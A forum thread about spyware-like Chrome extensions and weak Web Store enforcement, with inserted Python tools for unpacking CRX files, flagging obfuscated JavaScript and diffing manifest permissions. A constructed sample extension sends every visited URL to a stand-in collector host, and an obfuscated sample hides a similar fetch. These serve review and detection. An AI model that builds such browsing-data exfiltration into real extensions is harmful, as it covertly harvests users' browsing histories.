I was optimistically hoping some of the MV3 changes would result in Chrome webstore policy enforcement being standardized, but that hasn't happened.
Sensor Tower (https://sensortower.com/) makes a lot of popular extensions, like StayFocusd https://www.stayfocusd.com/. They seem to resell ad data (in violation of [1]?) and ship likely obfuscated code [2] (in violation of [3]?), but there's no enforcement or even clear reporting mechanism.
[1] https://developer.chrome.com/docs/webstore/program-policies/...
[2] https://robwu.nl/crxviewer/?crx=https%3A%2F%2Fclients2.googl...
[3] https://developer.chrome.com/docs/webstore/program-policies/...
Even with MV3 you still have access to `chrome.webRequest.onBeforeRequest` and content scripts, so this particular issue won't be 100% solved.
I don't think the solution is technical. The solution would be a strict policy, and nuke every extension and publisher from the store who even hints at doing this kind of BS.
I am absolutely flabbergasted at the fact that Chrome extension security is the way it is, considering how much Google spends to keep chrome secure.
How is it, in 2024, users can still blindly install malicious software directly into their browser from a web store with Google’s name at the top of it?
This goes to show even the most cautious and conscientious of users can get caught out by their extension changing hands. What, is Google expecting us to review our extensions, and their permissions, and their authors, and their authors’ associated businesses, every time we want to use our computer?
Additionally, are we even able to review the source code of extensions if they are not open source?
> I am absolutely flabbergasted at the fact that Chrome extension security is the way it is, considering how much Google spends to keep chrome secure.
It's crazy and it's not even a "Google Scale" problem. There are only around 2,000 extensions that are popular (100k+ users) and the co-ordinated malicious activity is super blatant.
> Additionally, are we even able to review the source code of extensions if they are not open source?
Yes and you can even do this without installing the code by downloading the zip file (that contains the extension code) by using the extensionId + a get request (or using a browser)
You can unpack and view the code of any extension after you've installed it. There's even a rule against obfuscation, though I'm not sure how enforced that is.
A Chrome extension is basically a zip archive with a bunch of JavaScript inside. There's no safeguarding of the code within.
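An added example (my own code, not from the thread or from any extension vendor) that does what the two comments above describe: it builds the update-service URL you fetch with a plain GET given the extension ID, strips the CRX3 container to get at the zip inside, and summarises the manifest. The clients2.google.com URL pattern is an assumption, since the thread's own link is truncated, and the sample .crx is constructed in the script with a zero-filled header instead of a real signature, so it runs offline and does no signature verification.

```python
"""Offline CRX3 unpacker: a Chrome extension is a CRX frame around an ordinary zip.
Added example; the update URL pattern and the sample file below are assumptions."""
import io
import json
import re
import struct
import zipfile
from urllib.parse import quote

CRX_MAGIC = b"Cr24"
# Web Store IDs are 32 characters drawn from a-p (hex digits mapped onto a..p).
EXT_ID_RE = re.compile(r"^[a-p]{32}$")


def webstore_crx_url(ext_id: str, chrome_version: str = "120.0.0.0") -> str:
    """URL that redirects to the .crx for a store extension (assumed pattern)."""
    if not EXT_ID_RE.match(ext_id):
        raise ValueError(f"not a Web Store extension id: {ext_id!r}")
    query = f"id={ext_id}&uc"
    return ("https://clients2.google.com/service/update2/crx"
            f"?response=redirect&prodversion={chrome_version}"
            f"&acceptformat=crx3&x={quote(query, safe='')}")


def split_crx(data: bytes) -> tuple[int, bytes, bytes]:
    """Return (format_version, header_bytes, zip_bytes).

    CRX3 layout: b'Cr24' | uint32 LE version (=3) | uint32 LE header_len | header | zip.
    The header is a protobuf CrxFileHeader carrying the publisher signatures; this
    function only skips it, so nothing here verifies who signed the file."""
    if data[:4] != CRX_MAGIC:
        raise ValueError("missing Cr24 magic: not a CRX file")
    version, header_len = struct.unpack_from("<II", data, 4)
    if version != 3:
        raise ValueError(f"unsupported CRX version {version} (only CRX3 handled)")
    start = 12 + header_len
    if start > len(data):
        raise ValueError("header_len runs past end of file")
    header, payload = data[12:start], data[start:]
    if payload[:2] != b"PK":
        raise ValueError("payload after header is not a zip")
    return version, header, payload


def unpack_crx(data: bytes) -> dict[str, bytes]:
    """Return {path: file_bytes} for every member of the embedded zip."""
    _, _, payload = split_crx(data)
    with zipfile.ZipFile(io.BytesIO(payload)) as zf:
        return {i.filename: zf.read(i) for i in zf.infolist() if not i.is_dir()}


def manifest_summary(files: dict[str, bytes]) -> dict:
    """Pull the security-relevant bits out of manifest.json."""
    m = json.loads(files["manifest.json"])
    return {
        "name": m.get("name"),
        "version": m.get("version"),
        "manifest_version": m.get("manifest_version"),
        "permissions": sorted(m.get("permissions", [])),
        "host_permissions": sorted(m.get("host_permissions", [])),
        "background": m.get("background", {}),
        "content_script_matches": [cs.get("matches", []) for cs in m.get("content_scripts", [])],
        "js_files": sorted(p for p in files if p.endswith(".js")),
    }


def build_sample_crx() -> bytes:
    """Constructed sample (not a real extension): a manifest plus a background
    script that forwards every requested URL, framed as CRX3 with a dummy header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps({
            "name": "Sample Focus Helper", "version": "1.2.3", "manifest_version": 3,
            "permissions": ["webRequest", "storage"],
            "host_permissions": ["<all_urls>"],
            "background": {"service_worker": "bg.js"},
        }))
        zf.writestr("bg.js",
                    "chrome.webRequest.onBeforeRequest.addListener(\n"
                    "  d => fetch('https://collector.example/log', {method: 'POST', body: d.url}),\n"
                    "  {urls: ['<all_urls>']});\n")
    header = bytes(32)  # placeholder where the real CrxFileHeader would sit
    return CRX_MAGIC + struct.pack("<II", 3, len(header)) + header + buf.getvalue()


if __name__ == "__main__":
    print(webstore_crx_url("a" * 32))
    files = unpack_crx(build_sample_crx())
    print(json.dumps(manifest_summary(files), indent=2))
    print(files["bg.js"].decode())
```

To use it on a real extension, fetch `webstore_crx_url(<id>)` (following the redirect) and pass the bytes to `unpack_crx`; then read the listed `js_files` the same way you would any untrusted code.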
> There's even a rule against obfuscation
This is definitely not enforced. I’ve downloaded multiple extensions in the past when I wanted to learn how they worked. All of them were obfuscated.
edit: saw the below comment and editing before this gets questioned. I’m not talking about minification. It was definitely obfuscation.
> There's even a rule against obfuscation
Does that only cover the background/web-worker or does it also include the UI parts (popup, content-ui, dev-tools...) ? That would make using something like React or Vue almost impossible.
There's no rule against minification, which I assume is what you're referring to when you say it would make using React or Vue impossible.
There's a difference between minification and obfuscation, but again, I'm not sure how they adjudicate it or how much they enforce it.
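The minification-versus-obfuscation distinction above is something you can put a rough heuristic on while reviewing an unpacked extension. This is an added example (my own, not from the thread and not how the Web Store adjudicates anything): minified bundles keep readable string literals and property names and just drop whitespace and shorten local names, while obfuscator output tends to show hex-named identifiers, rotated string tables, escape-encoded strings and dynamic evaluation. The thresholds and the three sample snippets are constructed assumptions, so treat a hit as a reason to read the file, not as proof.

```python
"""Heuristic classifier: plain / minified / obfuscated JavaScript.
Added example; thresholds and samples are my own assumptions."""
import re

HEX_IDENT = re.compile(r"\b_0x[0-9a-f]{3,}\b")               # javascript-obfuscator style names
ESCAPED_STR = re.compile(r"\\x[0-9a-f]{2}|\\u[0-9a-f]{4}")    # strings hidden as escapes
STRING_ARRAY = re.compile(r"\[\s*(?:'[^']*'\s*,\s*){8,}")     # large rotated string tables
DYNAMIC_EVAL = re.compile(r"\b(?:eval|Function|atob)\s*\(|String\.fromCharCode")
IDENT = re.compile(r"\b[A-Za-z_$][\w$]*\b")
JS_KEYWORDS = {"var", "let", "const", "function", "return", "if", "else", "for", "while",
               "new", "this", "typeof", "true", "false", "null", "undefined", "in", "of",
               "class", "import", "export", "default"}


def js_features(src: str) -> dict:
    """Counts that separate the three styles; property names count as identifiers too."""
    idents = [i for i in IDENT.findall(src) if i not in JS_KEYWORDS]
    short = sum(1 for i in idents if len(i) <= 2)
    lines = src.count("\n") + 1
    return {
        "hex_idents": len(HEX_IDENT.findall(src)),
        "escaped_chars": len(ESCAPED_STR.findall(src)),
        "string_arrays": len(STRING_ARRAY.findall(src)),
        "dynamic_eval": len(DYNAMIC_EVAL.findall(src)),
        "short_ident_ratio": short / max(len(idents), 1),
        "avg_line_len": len(src) / lines,
    }


def classify_js(src: str) -> str:
    """Obfuscation signals win over minification signals: obfuscated code is
    usually minified as well, and the obfuscation is the part worth reporting."""
    f = js_features(src)
    obf_score = ((f["hex_idents"] > 0) + (f["escaped_chars"] >= 8)
                 + (f["string_arrays"] > 0) + (f["dynamic_eval"] > 0))
    if obf_score >= 2:
        return "obfuscated"
    if f["avg_line_len"] > 150 and f["short_ident_ratio"] > 0.4:
        return "minified"
    return "plain"


def scan_files(files: dict[str, str]) -> dict[str, str]:
    """Classify every .js member of an unpacked extension ({path: source})."""
    return {p: classify_js(src) for p, src in files.items() if p.endswith(".js")}


# Constructed samples (not taken from any real extension).
PLAIN_SAMPLE = '''function logNavigation(details) {
  const entry = { url: details.url, when: Date.now() };
  console.log("navigation", entry);
  return entry;
}
'''
MINIFIED_SAMPLE = ('!function(e,t){"use strict";var n=e.document,r=t.createElement("div");'
                   'function o(e){return n.getElementById(e)}r.id="app",n.body.appendChild(r),'
                   't.render(o("app"),{a:1,b:2,c:3});for(var i=0,a=[1,2,3];i<a.length;i++)'
                   'r.textContent+=a[i]}(window,React);')
OBFUSCATED_SAMPLE = r"""var _0x3f2a=['\x6c\x6f\x67','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x2e\x65\x78','\x75\x72\x6c','\x66\x65\x74\x63\x68','a','b','c','d','e'];(function(_0x1b4c,_0x2d9e){var _0x4e1f=function(_0x5a3c){while(--_0x5a3c){_0x1b4c['push'](_0x1b4c['shift']());}};_0x4e1f(++_0x2d9e);}(_0x3f2a,0x1a3));var _0x1c8d=function(_0xa,_0xb){return _0x3f2a[_0xa-0x0];};window[_0x1c8d(0x3)](_0x1c8d(0x1));"""

if __name__ == "__main__":
    for name, src in [("plain", PLAIN_SAMPLE), ("minified", MINIFIED_SAMPLE),
                      ("obfuscated", OBFUSCATED_SAMPLE)]:
        print(name, "->", classify_js(src), js_features(src))
```

Feed `scan_files` the `{path: source}` map from an unpacked .crx; a React or Vue popup bundle should come back as "minified", which the store rule does not prohibit, while "obfuscated" is the case the rule is aimed at.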
> This goes to show even the most cautious and conscientious of users can get caught out by their extension changing hands
That's why on chromium I only install extensions that have their source on GitHub, as unpacked extensions.
There was a question raised but not really answered about "what do these extensions want with all this browsing data?" - while it may be that they're used for direct ad targeting (like real time ad buying against your IP address) it's more likely that they're selling "click stream" data.
In its most innocuous form, this is stuff like SimilarWeb (which is like a more advanced Google Trends), but in the B2B world, it's also custom enterprise reports that are like "how many people that use our bank at xyz also use any other bank at this array of domains and which are most common?"
Note: I am the author of this article.
That question is answered, in the last section of the article. And: yes, they are selling it, as they admit in the privacy policy.
I've decided that browser extensions are too much of a security/privacy risk. I just stick with 1password extension and an ad blocker extension that uses Safari's Content Blocker API only.
And then from time to time I have a dedicated profile on Chrome to use other extensions that might be useful, but I don't do day-to-day browsing there.
I'm similar
I have all relatives set up with a separate browser for e.g. banking, and it has no extensions at all
then the usual internet browsing one with the security nightmare that is the chrome/firefox app store
Is there any way to only allow chrome extensions to update with permission? It seems like any extension on the store could become malicious overnight, automatically, for millions of users.
Most users have no way to vet a chrome extension update (or on initial install). If we want strong security for everyone, we need better solutions than that
Here is one workaround: if you have to use a Chrome extension, make a separate profile just for that task. Don’t run any by default.
AFAIK there are two ways for this, neither of which is convenient to use: install all extensions from the source (you can unpack an existing crx for it or use their cloned repo if it's opensource) or use a group policy to disable extensions autoupdate and update each of them manually when the new version has something you want.
I don't think so. However, extensions are automatically disabled if they request more permissions. And in Manifest v3 most extensions won't have access to most pages unless you click on them.
> And in Manifest v3 most extensions won't have access to most pages unless you click on them.
That's not necessarily true.
Personally I have 15 extensions installed. Only four of them have access to all sites, and two of those are because they are not updated to Manifest v3 yet. I didn't say it was impossible for a Manifest v3 extension to have access to all sites. Most will not.
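If you go the manual-update route described above, the thing to check before accepting a new version is whether it widens what the extension can reach. This added script (mine, not from the thread) diffs two versions of a manifest.json and reports newly requested API permissions and host patterns, including the MV2-to-MV3 move of host patterns from `permissions` into `host_permissions`, and whether the update crosses from site-specific access to all-sites access. It does not reproduce Chrome's own warning tiers for deciding when to disable an extension; the list of APIs it treats as sensitive, the all-sites patterns, and the two sample manifests are my own assumptions.

```python
"""Diff two extension manifests and decide whether an update deserves review.
Added example; the sensitive-API list, all-sites patterns and samples are assumptions."""
import json

# Match patterns that grant access to every site (assumed list).
ALL_SITES = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# APIs whose addition in an update should hold it for review (my own list).
SENSITIVE_APIS = {"webRequest", "webRequestBlocking", "cookies", "history", "tabs",
                  "scripting", "nativeMessaging", "debugger", "proxy", "clipboardRead"}


def _is_host_pattern(p: str) -> bool:
    return p == "<all_urls>" or "://" in p


def host_patterns(m: dict) -> set[str]:
    """Every pattern that lets the extension read or run on pages.
    MV2 listed host patterns under "permissions"; MV3 moved them to
    "host_permissions"; content_scripts matches apply in both."""
    pats = {p for p in m.get("permissions", []) if _is_host_pattern(p)}
    pats.update(m.get("host_permissions", []))
    for cs in m.get("content_scripts", []):
        pats.update(cs.get("matches", []))
    return pats


def api_permissions(m: dict) -> set[str]:
    return {p for p in m.get("permissions", []) if not _is_host_pattern(p)}


def grants_all_sites(pats: set[str]) -> bool:
    return bool(pats & ALL_SITES)


def diff_manifests(old: dict, new: dict) -> dict:
    old_hosts, new_hosts = host_patterns(old), host_patterns(new)
    old_api, new_api = api_permissions(old), api_permissions(new)
    return {
        "version": (old.get("version"), new.get("version")),
        "manifest_version": (old.get("manifest_version"), new.get("manifest_version")),
        "added_permissions": sorted(new_api - old_api),
        "removed_permissions": sorted(old_api - new_api),
        "added_hosts": sorted(new_hosts - old_hosts),
        "removed_hosts": sorted(old_hosts - new_hosts),
        "all_sites_before": grants_all_sites(old_hosts),
        "all_sites_after": grants_all_sites(new_hosts),
        "background_changed": old.get("background") != new.get("background"),
    }


def should_block_update(report: dict) -> bool:
    """Hold the update for manual review if it reaches more hosts, newly
    reaches every site, or adds one of the APIs listed above."""
    return (bool(report["added_hosts"])
            or (report["all_sites_after"] and not report["all_sites_before"])
            or bool(set(report["added_permissions"]) & SENSITIVE_APIS))


# Constructed sample manifests (not from any real extension).
OLD_MANIFEST = {
    "name": "Sample Focus Helper", "version": "1.0", "manifest_version": 2,
    "permissions": ["storage", "https://app.example/*"],
    "content_scripts": [{"matches": ["https://app.example/*"], "js": ["cs.js"]}],
    "background": {"scripts": ["bg.js"]},
}
NEW_MANIFEST = {
    "name": "Sample Focus Helper", "version": "2.0", "manifest_version": 3,
    "permissions": ["storage", "webRequest", "tabs"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["https://app.example/*"], "js": ["cs.js"]}],
    "background": {"service_worker": "bg.js"},
}
BENIGN_UPDATE = {**OLD_MANIFEST, "version": "1.1"}  # same permissions, new version only

if __name__ == "__main__":
    for new in (BENIGN_UPDATE, NEW_MANIFEST):
        report = diff_manifests(OLD_MANIFEST, new)
        print(json.dumps(report, indent=2))
        print("hold for review:", should_block_update(report))
```

Run `diff_manifests` on the manifest.json from the installed copy and from the freshly downloaded .crx; a result of `should_block_update(...) == True` is the case where the comment above says Chrome would disable the extension and ask again, and the case where a manual updater should stop and read the new code.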
> Is there any way to only allow chrome extensions to update with permission?
With a firewall.
Can a firewall rule distinguish between an extension update and a new install? Would blocking the entire chrome web store cause other problems in chrome?
Why is Google not policing this? Liability concerns?
Not reliably detectable by machines, not willing to allocate humans.
Most people aren't (or at least feel they aren't) able to take a hardline stance about only using free software, but if there's one area of your digital life you should be able to apply it to, it's browser extensions.